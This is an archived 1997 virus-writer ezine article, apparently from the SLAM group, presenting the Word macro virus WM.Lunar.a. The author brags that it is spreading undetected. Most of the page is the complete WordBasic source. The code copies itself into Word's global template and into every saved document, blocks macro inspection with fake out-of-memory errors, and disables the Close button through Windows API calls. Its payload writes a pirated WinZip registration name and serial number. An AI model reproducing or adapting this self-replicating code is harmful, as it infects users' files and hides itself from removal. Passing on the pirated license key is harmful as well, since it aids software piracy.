Copy Link
Add to Bookmark
Report

SLAM3.016: Lunar Word Macro Virus by Hyperlock [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

Lunar Word Macro Virus

by Hyperlock [SLAM]


Identification:

  • VIRUSNAME: WM.Lunar.a
  • SIZE: 17,920 Bytes (8 Macros)
  • VERSION: v1.00
  • ORIGIN: United Kingdom
  • AUTHOR: Hyperlock
  • DATE: June, 1997

Characteristics:

  • Polymorphism: No
  • Stealth: Disables all normal methods of macro deletion
  • Encrypted: Yes
  • Retro: No
  • External Infection: No
  • Other Properties: Auto-Registration of WinZip
  • Word Version: 32-bit versions only (API calls)

VIRUS DESCRIPTION

This virus makes extensive use of the API, in particular user32.exe, to perform some otherwise impossible tasks. I have had it with messing about with Word's crappie built-in functions, and there is rarely anything interesting worth searching for that may be of any use and even if there are, they don't fuckin' work properly.

Being a lazy bastard, I have disabled most calls for macro viewing be just displaying a message box and not processing the request. I would have put some decent stealth on it, but am still fuckin' writing it. When finished, it will be an extension of Virtual Boy's add-in stealth method (nice one VB!), but should work a bit better and stops Word complaining about invalid add-ins when loading. I am still working on a tunnelling virus for Excel and is a 7-level tunneller at the moment! Getting better.

Anyway, back to business. Like I said, I have used basic stealth, but it works and will just annoy the fuck out of anyone without a brain. So, macros FileTemplates and ToolsMacro are both disabled. It's propagation is quite r obust, and is based loosely on the method of the Hyper virus (still not detected by virus scanners, and in case you wondered AV people, IT IS IN THE FUCKIN' WILD NOW!!! I.E., MORE THAN TWO COMPANIES).

The interesting bit is the use of the API to change Word's system menu. Any option can be altered, but in the case of the Lunar virus, it changes the Close option to SLAM and disables the option. You will also notice it disables the Close button as well, which isn't fuckin' surprising as it is the same ID. This now forces the use of FileExit to exit Word and it just so happens that I have made FileExit the payload. Well, fuck me if that was a coincidence!

The payload is non destructive to data, and even does some good from the user's point of view. The payload automatically registers WinZip 6.x (the current and future versions that support current registration details) to be 'SLAM Virus Team'. If a registration already exists then it leaves it. This removes the annoying start-up dialog box so it is good from that point of view.

So, to summarise, here are the virus's macros:

  • AutoExec
  • AutoOpen
  • AutoClose
  • FileExit
  • FileSaveAs
  • FileSave
  • FileTemplates
  • ToolsMacro

And lastly, in case YOU CAN'T BE FUCKIN' BOTHERED LOOKING AT THE CODE, here is the official 'SLAM Virus Team' WinZip registration name and code:

  • Name: SLAM Virus Team
  • SN: 47036847

If you are a lazy bastard, you can let this virus register it for you <<laugh>>.

Hyperlock [SLAM]

VIRUS CODE

---------------------------------------------------------------------------------------- 

REM
REM WM.Lunar virus
REM AutoExec macro
REM

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer

Declare Function GetFocus Lib "User32"() As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer



Sub MAIN
On Error Goto endsub

x = AlterMenu("SLAM", 6, 1)

endsub:
End Sub


Function AlterMenu(item$, item, flag)

hWnd = FindWindowA("OPUSAPP", 0)
hmenu = getsystemmenu(hwnd, 0)
hItem = getmenuitemid(hMenu, item)
AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$)

End Function


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM Autoopen macro
REM

Declare Function FindWindowA Lib "User32"(lpClassName$, lpWindowName As Long) As Integer

Declare Function GetFocus Lib "User32"() As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer

Declare Function ModifyMenuA Lib "User32"(hMenu As Integer, nPosition As Integer, wFlags As Integer, wIDNewItem As Integer, lpString$) As Integer

Declare Function GetMenuItemID Lib "User32"(hMenu As Integer, nPos As Integer) As Integer

Declare Function GetSystemMenu Lib "User32"(hWnd As Integer, bRevert As Integer) As Integer


Sub MAIN
On Error Goto endsub

x = AlterMenu("SLAM", 6, 1)

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0

ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec", 1
MacroCopy ct$ + ":autoclose", "global:autoclose", 1
MacroCopy ct$ + ":autoopen", "global:autoopen", 1
MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1
MacroCopy ct$ + ":filesave", "global:filesave", 1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1
MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1
profupdate

endsub:
End Sub



Sub profupdate

entry$ = GetPrivateProfileString$("virus", "lunar", "lunar.ini")

If entry$ = "" Then
SetPrivateProfileString("virus", "lunar", "1", "lunar.ini")
SetPrivateProfileString("virus", "author", "Hyperlock", "lunar.ini")

Else
a = Val(entry$) + 1
entry$ = Str$(a)
SetPrivateProfileString("virus", "lunar", entry$, "lunar.ini")
End If

End Sub



Function AlterMenu(item$, item, flag)

hWnd = FindWindowA("OPUSAPP", 0)
hmenu = getsystemmenu(hwnd, 0)
hItem = getmenuitemid(hMenu, item)
AlterMenu = ModifyMenuA(hmenu, hitem, flag, - 10, item$)

End Function


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM Autoclose macro
REM

Sub MAIN
On Error Goto endsub

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0

REM copy macros
ct$ = FileName$()
MacroCopy ct$ + ":autoexec", "global:autoexec", 1
MacroCopy ct$ + ":autoclose", "global:autoclose", 1
MacroCopy ct$ + ":autoopen", "global:autoopen", 1
MacroCopy ct$ + ":filesaveas", "global:filesaveas", 1
MacroCopy ct$ + ":filesave", "global:filesave", 1
MacroCopy ct$ + ":toolsmacro", "global:toolsmacro", 1
MacroCopy ct$ + ":filetemplates", "global:filetemplates", 1
autoopen.profupdate

endsub:
End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileExit macro (Payload)
REM

Sub MAIN
On Error Goto endsub

name$ = GetProfileString$("WinZip", "Name")
sn$ = GetProfileString$("WinZip", "SN")

If name$ = "" Then
SetProfileString("Winzip", "Name", "SLAM Virus Team")
SetProfileString("Winzip", "SN", "47036847")
End If

endsub:
FileExit
End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileSaveAs Macro
REM


Sub MAIN
On Error Goto endsub

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty

Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
dlg.Format = 1

ct$ = FileName$()

MacroCopy "global:autoexec", ct$ + ":autoexec", 1
MacroCopy "global:autoclose", ct$ + ":autoclose", 1
MacroCopy "global:autoopen", ct$ + ":autoopen", 1
MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1
MacroCopy "global:filesave", ct$ + ":filesave", 1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1
MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1
autoopen.profupdate

FileSaveAs dlg

REM bypass the if statement below
Err = 102

endsub:
If Err <> 102 Then
FileSaveAs dlg
End If

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileSave macro
REM

Sub MAIN
On Error Goto endsub
REM stops error 24 when macros already exist

DisableInput 1
ToolsOptionsSave .GlobalDotPrompt = 0, .RecommendReadOnly = 0
DisableAutoMacros 0
SetDocumentDirty

REM Force document to be a template (change to template and save)
Dim dlg As FileSaveAs
GetCurValues dlg
dlg.Format = 1
FileSaveAs dlg

ct$ = FileName$()
MacroCopy "global:autoexec", ct$ + ":autoexec", 1
MacroCopy "global:autoclose", ct$ + ":autoclose", 1
MacroCopy "global:autoopen", ct$ + ":autoopen", 1
MacroCopy "global:filesaveas", ct$ + ":filesaveas", 1
MacroCopy "global:filesave", ct$ + ":filesave", 1
MacroCopy "global:toolsmacro", ct$ + ":toolsmacro", 1
MacroCopy "global:filetemplates", ct$ + ":filetemplates", 1
autoopen.profupdate

FileSave

REM bypass the if statement below
Err = 102

endsub:
If Err <> 102 Then
FileSave
End If

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM FileTemplates macro
REM

Sub MAIN

MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)

End Sub


----------------------------------------------------------------------------------------


REM
REM WM.Lunar
REM ToolsMacro macro
REM

Sub MAIN

MsgBox("Not enough memory to perform this operation", "Microsoft Word", 48)

End Sub


----------------------------------------------------------------------------------------


HL [SLAM]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT